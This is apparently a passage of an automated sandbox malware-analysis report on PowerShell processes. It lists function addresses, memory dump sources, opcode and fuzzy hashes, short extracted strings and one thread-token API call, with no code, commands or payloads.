Instruction Fuzzy Hash: F0E08035F00014978704D659D8514EDF765DFCD221F04847FED1997741DE32591786E5

Function 03458978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ddeeab686776513bf364fcae342ce5de726dd742bcb7759033268d22abf776e
Instruction ID: 9006c753a7955ae986fd5a03085bb91de9294f33b38f2723da846ee394a391f9
Opcode Fuzzy Hash: 7ddeeab686776513bf364fcae342ce5de726dd742bcb7759033268d22abf776e
Instruction Fuzzy Hash: 7AE0807970872457CB097775B85C6AF7A56FBC4765F04002AE60587341CF7D590183DD

Function 03459558 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee7a93605ce0a4ea71eedecf58ade6aea2f81c789954513400842f06ed1bd65d
Instruction ID: cfc7842f57ae4657229db5f224900511b940cc15a122bbc71612de65719a1ea4
Opcode Fuzzy Hash: ee7a93605ce0a4ea71eedecf58ade6aea2f81c789954513400842f06ed1bd65d
Instruction Fuzzy Hash: 71D01716B0122A0F4995B1EF28006BBA1CECAC55E1B09007BAE05DF382ED44CC0103E9

Function 0345DCA0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b61bb4e9337c2da71d2b27e83a327aef065fce6b412284fe439a8cf2f1db25
Instruction ID: 6b3afb19ea18a5e0ef4171664258fada6513f15cfa4941fd14525d30f864dbde
Opcode Fuzzy Hash: 42b61bb4e9337c2da71d2b27e83a327aef065fce6b412284fe439a8cf2f1db25
Instruction Fuzzy Hash: 9AE0C236F407180B8616A66EA81089FBBDEDFC6671344403EF42ACB300DFA4DD0647E9

Function 03458800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81049bc7ae541f7593c1dd8bdb922f4b2b2732220dc89a840cb4c1108439ea60
Instruction ID: 3fea11b1ff14a292c015f985455ba17a02c801a84e3b43e792fc54bf832ec5a5
Opcode Fuzzy Hash: 81049bc7ae541f7593c1dd8bdb922f4b2b2732220dc89a840cb4c1108439ea60
Instruction Fuzzy Hash: B7E086B7E1834B8FCB08EBA8F4874AEBFB1AB45205B004056ED5593341EB355956CB94

Function 0345DD65 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10769d95a0d571d758de04d8098732b5ced83f1209908ac205305842b8f66220
Instruction ID: 30ecc98a56851f9ea46a90298ec683ee64f579495eebae2829a0d547564f2553
Opcode Fuzzy Hash: 10769d95a0d571d758de04d8098732b5ced83f1209908ac205305842b8f66220
Instruction Fuzzy Hash: EAE0C232F44808CB8B04CF48E4800FCB725EEDA22074441ABE92B8F296D6315497C689

Function 03457932 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e1e666460dab22f690d16a98c71b6287f3c26a274f5e9457f3e4d6ec43c29f1
Instruction ID: 06489f43bea2763049d709658690ed28a07d7cb8d156e5e5860facc3d1e8ab65
Opcode Fuzzy Hash: 7e1e666460dab22f690d16a98c71b6287f3c26a274f5e9457f3e4d6ec43c29f1
Instruction Fuzzy Hash: AFD05E3204D3C58FC7065B70A466490BF24AB0202435608EFE84DDE1A3866A5A48DBA5

Function 0345F870 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 58622c03706b5258c9a55914e2dc7c14d7adc1897e1a6447f9b698958b4683cd
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: ECD067B0D04209DF8780EFADC94156EFBF4EB48200F6085AA9919E7301E7329A16CBD5

Function 03458748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13401151814e5caf000bec114ae1b1dfa48a1ab7963169db5784648c13af44ad
Instruction ID: 8d4e307029be914482a88332697145dd163e45ff7ddc885a1d4851a2342b113d
Opcode Fuzzy Hash: 13401151814e5caf000bec114ae1b1dfa48a1ab7963169db5784648c13af44ad
Instruction Fuzzy Hash: 94D06775D082198BCB0CEBA4F85B4BDBB74FA54301F404169E91792191EE352A5ACBC5

Function 03457EA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb672182d7251c261579152a00fa35aa701433a0afabc3d153c5a7155dd56f53
Instruction ID: 03626e68a5bc99378fd5f4e192985da08ae7ddfa658f5307fb7ead0e9baaad37
Opcode Fuzzy Hash: bb672182d7251c261579152a00fa35aa701433a0afabc3d153c5a7155dd56f53
Instruction Fuzzy Hash: F0C08C5352C3A0CFEF0B66381C2649AAF318583011307C6D3D081C2452C9150500C250

Function 03457940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8675e8317f49ca6dca1a3a387f92907d2a66579b10cc99e400361a2b8ede885f
Instruction ID: ab0fde35d9d2b0928dac6a2a47d71029d837c684a406875d3f70d9309e963c24
Opcode Fuzzy Hash: 8675e8317f49ca6dca1a3a387f92907d2a66579b10cc99e400361a2b8ede885f
Instruction Fuzzy Hash: 9FB09231084709CFC2496F75E4088147329BF4021939008A8E92E5A296CE36E889CA45

Non-executed Functions

Function 079B3928 Relevance: 12.8, Strings: 10, Instructions: 322COMMON

Download Yara Rule

Strings

%l, xrefs: 079B3A1D
4'^q, xrefs: 079B3B35
$^q, xrefs: 079B3960
tP^q, xrefs: 079B39A5
$^q, xrefs: 079B396C
$^q, xrefs: 079B3C0E
%l, xrefs: 079B3A0F
tP^q, xrefs: 079B39B1
4'^q, xrefs: 079B3B29
$^q, xrefs: 079B393A

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$%l$%l
API String ID: 0-4025564121
Opcode ID: f9fae05086e7ba1d792fc8e457a1e7518a5584d07e04754c0716aeeed7487163
Instruction ID: 7fa2d2f52ea04dd417bae42537c4b4653a4c5e09449caa957af9a34b0f623d8d
Opcode Fuzzy Hash: f9fae05086e7ba1d792fc8e457a1e7518a5584d07e04754c0716aeeed7487163
Instruction Fuzzy Hash: 0BA178B17043199FC734CB799A017A6BBE9EFC6614F24846AD809CF392DB31D885C7A1

Function 079B3678 Relevance: 8.9, Strings: 7, Instructions: 192COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079B372E
%l, xrefs: 079B386D
$^q, xrefs: 079B37FF
%l, xrefs: 079B387B
$^q, xrefs: 079B382A
4'^q, xrefs: 079B3722
$^q, xrefs: 079B3836

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$%l$%l
API String ID: 0-908776246
Opcode ID: 71684052089d8f8d7b0ac3b14d6aa5c0682554a8ddeea04490b51b60bb1f5b35
Instruction ID: 03b00210d20ae93337e84299189c0e5354b04325397d8c626d9c35b7dfd15b7b
Opcode Fuzzy Hash: 71684052089d8f8d7b0ac3b14d6aa5c0682554a8ddeea04490b51b60bb1f5b35
Instruction Fuzzy Hash: 43517CF570434A9FCB34CA299A016E7FBBAEFC2614F14846BD445CB351DA31C885C7A2

Function 03457A21 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

`_q, xrefs: 03457B23
`_q, xrefs: 03457C44
`_q, xrefs: 03457BA2
tM/l, xrefs: 03457AD4
`_q, xrefs: 03457CC2

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID: tM/l$`_q$`_q$`_q$`_q
API String ID: 0-2896919081
Opcode ID: 59f99262f80b42987da5182b13e5a7d992a208efd3c9031f559b9adec6c75e18
Instruction ID: fd6b00f3a42483b88d965e99bbc215c87b650e1e7414da50d1f067f5e3b25396
Opcode Fuzzy Hash: 59f99262f80b42987da5182b13e5a7d992a208efd3c9031f559b9adec6c75e18
Instruction Fuzzy Hash: D2B1A874E002099FCB55DFA9D580A9EFBF2FF48310F14862AE819AB315DB35A945CF90

Function 03457A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`_q, xrefs: 03457B23
`_q, xrefs: 03457C44
`_q, xrefs: 03457BA2
tM/l, xrefs: 03457AD4
`_q, xrefs: 03457CC2

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID: tM/l$`_q$`_q$`_q$`_q
API String ID: 0-2896919081
Opcode ID: 72a451f779ec5dc6ebfc802934d5a8c6f6c2144513838f4a875bb4d7c103196d
Instruction ID: b59eb49183752143155af1358864ab784ed5ff220a5a3821e79073f514aa9afe
Opcode Fuzzy Hash: 72a451f779ec5dc6ebfc802934d5a8c6f6c2144513838f4a875bb4d7c103196d
Instruction Fuzzy Hash: D3B1B774E002099FCB55DFA9D580A9EFBF2FF48310F10862AE819AB315DB34A945CF90

Function 079B5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 079B5800
$^q, xrefs: 079B57C6
$^q, xrefs: 079B57F4
$^q, xrefs: 079B57AA

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 6d6ac95f782a7e93b7a1faa27f697ad3cb2df0c8554616f87f25e88fcc6dd799
Instruction ID: c0d9259addae101d63f112d34b24e9cec1ed506a0b0f39df8ab6ec64270f6b36
Opcode Fuzzy Hash: 6d6ac95f782a7e93b7a1faa27f697ad3cb2df0c8554616f87f25e88fcc6dd799
Instruction Fuzzy Hash: 20218BF170030A9BDB34592A8A40BA7B7DE6FC0718F25883AA905CF385CDB5C8558361

Function 079B0308 Relevance: 5.1, Strings: 4, Instructions: 66COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079B037F
$^q, xrefs: 079B035E
$^q, xrefs: 079B0352
4'^q, xrefs: 079B0373

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: b41f198badfb337c41a62e5812543d6ab636fbcceebae050f23faa25feb9df0e
Instruction ID: 2c6e2798dea2882af2a71d1195a95d0428117db2e3543c59222d72848a287e2e
Opcode Fuzzy Hash: b41f198badfb337c41a62e5812543d6ab636fbcceebae050f23faa25feb9df0e
Instruction Fuzzy Hash: 7111E561B0A3994FC73B163C2A245E6AFBA5F8356071A05E7D141CF366CD188D4D83A2

Analysis Process: powershell.exePID: 7292, Parent PID: 6648COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 04EAB470 Relevance: .3, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 211814c78cfd7a8cd6b1f00ff4cce754b76fad80487d480c371c2cf34365d6e0
Instruction ID: 572e8f911b17e5b68f03584b56a783c93312340270e012ca53d73bdc36b72f9c
Opcode Fuzzy Hash: 211814c78cfd7a8cd6b1f00ff4cce754b76fad80487d480c371c2cf34365d6e0
Instruction Fuzzy Hash: 7B918271B007195BEB2AEBB4C4156AEB7F2EFC4704B00892DD14AAF350DF7469068BD6

Function 04EAB490 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f918622683d16e8d3fe44f046fd96415497dd3d66889eda7ec2acebbe064530d
Instruction ID: 0b27c72951003b9e725da6d816fc0ad7db6fb820515fc67dd263ce80b1f3d9ed
Opcode Fuzzy Hash: f918622683d16e8d3fe44f046fd96415497dd3d66889eda7ec2acebbe064530d
Instruction Fuzzy Hash: 80916275B007195BEB2AEBB4C4055AEB7F2EFC4704B00892DD14AAF350DF74A9068BD6

Function 07962308 Relevance: 13.1, Strings: 10, Instructions: 626COMMON

Download Yara Rule

Strings

J0l, xrefs: 079623D1
4'^q, xrefs: 0796260D
J0l, xrefs: 0796259E
r/l, xrefs: 07962559
4'^q, xrefs: 07962619
J0l, xrefs: 079625EA
J0l, xrefs: 0796237F
J0l, xrefs: 079625F6
J0l, xrefs: 079623C5
r/l, xrefs: 0796254F

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$J0l$J0l$J0l$J0l$J0l$J0l$r/l$r/l
API String ID: 0-2209822685
Opcode ID: dead97c50db16c16e76ef26848186258d596303907215bb63a406179a2e289a4
Instruction ID: 39c6966ac0be744ad967a22860a8a033dea4117fa9549d517ac1fcb1aea69a35
Opcode Fuzzy Hash: dead97c50db16c16e76ef26848186258d596303907215bb63a406179a2e289a4
Instruction Fuzzy Hash: A8226AB1B0020ACFCB109F68C948AAABBF5BF89314F14857AE405CB351DB35DD45CBA2

Function 07963CE8 Relevance: 6.8, Strings: 5, Instructions: 578
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 07964026
4'^q, xrefs: 07964030
], xrefs: 0796408D
4'^q, xrefs: 07964180
4'^q, xrefs: 0796418A

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$]
API String ID: 0-3247711019
Opcode ID: 905f3630333d72a2e1fb7bed06c084db5f222f15d5b74a1d94e58bf12de39d53
Instruction ID: 7978300a61e5062f1f6b7acec68dd1284495a4d43c44f2da0bf6b3507df6ffb0
Opcode Fuzzy Hash: 905f3630333d72a2e1fb7bed06c084db5f222f15d5b74a1d94e58bf12de39d53
Instruction Fuzzy Hash: CE12BCF1B0025A9FCB159BA8C90576BBBB69FD1314F1485BAD901CF362CB31C986C7A1

Function 08F06821 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(F2700892), ref: 08F0688A

Memory Dump Source

Source File: 00000007.00000002.1733227571.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f00000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 4ba6f193c75d49611b46c4155a822a445761f74087eb5e86f3e319d69bf62add
Instruction ID: dcb9abb2f6835b450149ac860498d0eed5065d0a68eb3abb80353f87a4a55f65
Opcode Fuzzy Hash: 4ba6f193c75d49611b46c4155a822a445761f74087eb5e86f3e319d69bf62add
Instruction Fuzzy Hash: 5C1116B59002498FCB10DFADC584BDEFFF4AF88324F248419D459A7650D7B4A944CFA4

Function 08F06828 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(F2700892), ref: 08F0688A

Memory Dump Source

Source File: 00000007.00000002.1733227571.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f00000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 54383fa0bc67e3c7de5774ff91ff44a5a2386f4a4eb0c126ebdb2532d033ec4f
Instruction ID: ae9c69ecba1c3459ff08f67bd87474223fd9676636b8a14abbe1404ba4b64de3
Opcode Fuzzy Hash: 54383fa0bc67e3c7de5774ff91ff44a5a2386f4a4eb0c126ebdb2532d033ec4f
Instruction Fuzzy Hash: 4F11E3B59003098FDB10DF9AC984B9EFBF8AB48324F248419D458A7250D7B9A944CFA5

Function 04EAE610 Relevance: 1.4, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J0l, xrefs: 04EAE6EA

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: J0l
API String ID: 0-3440382688
Opcode ID: 76b5bcc45fa9edf1a55157de6262d203803e2bccfa1cda1ff16edbc19779566a
Instruction ID: 8f5676707e7056a63f943f28f10c2cb7cab4901efca07ddb9a1b408b6cd0b597
Opcode Fuzzy Hash: 76b5bcc45fa9edf1a55157de6262d203803e2bccfa1cda1ff16edbc19779566a
Instruction Fuzzy Hash: E5419F30A442459FCB15DF78E554A9DBBF2EF89304F1481ADE409EB3A5CB34AD09CB90

Function 04EA6FC8 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 04EA70ED

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: b8c339ca0392489b1140a8747790c877f89c916d74f47e7610534c721e12232c
Instruction ID: 0381f9773c6ec79b17ba8d56fc1dbf71db4a0ff9d66430d8ef30f36638ae4253
Opcode Fuzzy Hash: b8c339ca0392489b1140a8747790c877f89c916d74f47e7610534c721e12232c
Instruction Fuzzy Hash: C1414F34B042048FDB14DF64C598AAEBBF1EF8D315F145099E446EB3A5DA35ED41CB50

Function 04EAE640 Relevance: 1.3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J0l, xrefs: 04EAE6EA

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: J0l
API String ID: 0-3440382688
Opcode ID: e73d14bcc763cc588c84341fbe3729ff615e1ae7a010c615e46384ce2a2b6e47
Instruction ID: bcd7c213d7f07833e3ce8ee7655fbc48f7b6bb970ceb7e4c3d9af2a79a79582f
Opcode Fuzzy Hash: e73d14bcc763cc588c84341fbe3729ff615e1ae7a010c615e46384ce2a2b6e47
Instruction Fuzzy Hash: E9314034A00205DFCB14EF69E598A9DBBF2FF88304F148569E419AB3A4DB34BD45CB90

Function 04EAAF98 Relevance: 1.3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&^q, xrefs: 04EAAFBA

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: (&^q
API String ID: 0-2067289071
Opcode ID: 346a4aabff7098baeaa3c2f13e729dedbf8e408025dcb3aaf754e2811dacf113
Instruction ID: 94e42a90c632e22afa5a5d76fa04fe4e677af6b9f185fe004c7c5e8a0c04bb7b
Opcode Fuzzy Hash: 346a4aabff7098baeaa3c2f13e729dedbf8e408025dcb3aaf754e2811dacf113
Instruction Fuzzy Hash: E421AE75A042588FCB14DFAED404AAFBFF5EB89320F14846AD118AB350CA75A805CBA5

Function 04EA29F0 Relevance: .2, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e391161550633163cf63e7b70e9c9bf698c35a2acde21d6d9f142a0ccb5e41
Instruction ID: 745e88fe5bdc4d6aef280fa462e2bbabee5885967f4919040dd63aae8444ea3a
Opcode Fuzzy Hash: 24e391161550633163cf63e7b70e9c9bf698c35a2acde21d6d9f142a0ccb5e41
Instruction Fuzzy Hash: D6918AB4A006058FCB15CF58C4849AEFBB1FF88310B2486A9D955AB365C735FC51CBA0

Function 04EABAC0 Relevance: .2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f12dd9499c1196cc426aef3ed6f8f2a9d0f2faa3e77a7ecf34c7794a8ee37f
Instruction ID: 1016bc7f948ae76a0b016a14879381c1a62661512ca0a72fa45dde4671264b0f
Opcode Fuzzy Hash: 94f12dd9499c1196cc426aef3ed6f8f2a9d0f2faa3e77a7ecf34c7794a8ee37f
Instruction Fuzzy Hash: 8E611671E002488FCB15DFA9D584A9DFBF1EF88314F14816AE919AB364EB34A945CB50

Function 04EABAB0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 974e9da798c6495e160ee3167a5fae7a61481f48b34569542b2e93de9014afb4
Instruction ID: 2c0565b11bf288ebac4f652929a87560e827e5dfa5749e71b9ef6506571091c6
Opcode Fuzzy Hash: 974e9da798c6495e160ee3167a5fae7a61481f48b34569542b2e93de9014afb4
Instruction Fuzzy Hash: 83513471E00248DFCB15DFA9D584A9DFBF2FF88314F14806AE919AB364EB34A945CB50

Function 04EAE419 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 349de97765594b5638d05482946d446541a5c3b4c58f17a14fcec7664d2e997e
Instruction ID: 38e3f23332c47f0218b1ee8e7e0751fd343af6ce935c904ff68ee187e5e77c7d
Opcode Fuzzy Hash: 349de97765594b5638d05482946d446541a5c3b4c58f17a14fcec7664d2e997e
Instruction Fuzzy Hash: 4E516D34B403058FCB14EF6CD59496ABBE6EFC8314B1584A9E509CF366EB34EC118B50

Function 04EAE428 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94e8658f2ffdb7c238c48da7085a1fe6b610c06ae0fb43dd0e09b43affb530ed
Instruction ID: 2b2d4569b65e5066e744285463b0011c2d54fb2c671c40a82f8fa60b131d30c2
Opcode Fuzzy Hash: 94e8658f2ffdb7c238c48da7085a1fe6b610c06ae0fb43dd0e09b43affb530ed
Instruction Fuzzy Hash: 77412974B403168FCB14EF6CC69496ABBE6EFC8314B158468E509DF369EB34EC118B91

Function 07963CCC Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9870fa303e5fc7b09875dad03dc4277c4b0830a9738e835c3f3031785063a935
Instruction ID: 78c257b2bbf22bb13e141f74c74aaa34a7da1f53cf82f90de21f840b304acd14
Opcode Fuzzy Hash: 9870fa303e5fc7b09875dad03dc4277c4b0830a9738e835c3f3031785063a935
Instruction Fuzzy Hash: C6415BF5F00206DFCB268F24C61967ABBF6AF81748F048699D9019F252C731ED46C7A1

Function 04EA2B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558bf64ce2a3d8bab55f6ac931646c6d2abe20911c2d3189e182e78dae3cf539
Instruction ID: 43a89aa2ef9ec8b08bf1d63fa11dceae89980c7f7f22751c6ae5372bb99c744d
Opcode Fuzzy Hash: 558bf64ce2a3d8bab55f6ac931646c6d2abe20911c2d3189e182e78dae3cf539
Instruction Fuzzy Hash: 194149B4A006059FCB05CF58C5989AEFBB1FF48314B1185A9D916AB364C736FCA1CFA0

Function 04EAC388 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

